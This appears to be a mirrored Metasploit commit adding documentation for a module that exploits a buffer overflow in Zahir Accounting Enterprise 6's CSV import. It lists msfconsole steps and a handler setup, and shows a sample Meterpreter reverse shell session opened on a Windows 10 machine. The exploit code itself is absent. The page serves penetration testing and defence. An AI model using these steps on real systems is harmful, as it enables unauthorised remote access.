mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Add documentation for Zahir Import File Module
This commit is contained in:
parent
060c68d2e0
commit
b5c13690c0
@ -0,0 +1,41 @@
|
||||
## Description
|
||||
|
||||
Zahir Accounting Enterprise 6 through build 10.b contains a buffer overflow vulnerability in its Import file functionality, which can be triggered with a crafted CSV file.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Zahir Enterprise 6](http://zahiraccounting.com/files/zahir-accounting-6-free-trial.zip) through build 10.b
|
||||
|
||||
[Update to build 10b](http://zahirsoftware.com/zahirupdate/Zahir_SMB_6_Build10b%20-%20MultiUser.zip)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. `./msfconsole -q`
|
||||
2. `use exploit/windows/fileformat/zahir_enterprise_plus_csv`
|
||||
3. `run`
|
||||
4. `handler -p <payload> -H <lhost> -P <lport>`
|
||||
5. From Zahir Application. File -> Import -> Import from File -> Select option -> Specify msf generated file -> Click through to Process
|
||||
6. Get a session
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Zahir Enterprise 6 build 10b on Windows 10 x64
|
||||
|
||||
```
|
||||
msf5 exploit(windows/fileformat/zahir_enterprise_plus_csv) >
|
||||
[*] Started reverse TCP handler on 172.22.222.130:4444
|
||||
[*] Sending stage (179779 bytes) to 172.22.222.200
|
||||
[*] Meterpreter session 4 opened (172.22.222.130:4444 -> 172.22.222.200:49934) at 2018-10-04 10:09:01 -0500
|
||||
sessions -i 4
|
||||
[*] Starting interaction with 4...
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-IPOGIJR
|
||||
OS : Windows 10 (Build 17134).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter >
|
||||
```
|
Loading…
Reference in New Issue
Block a user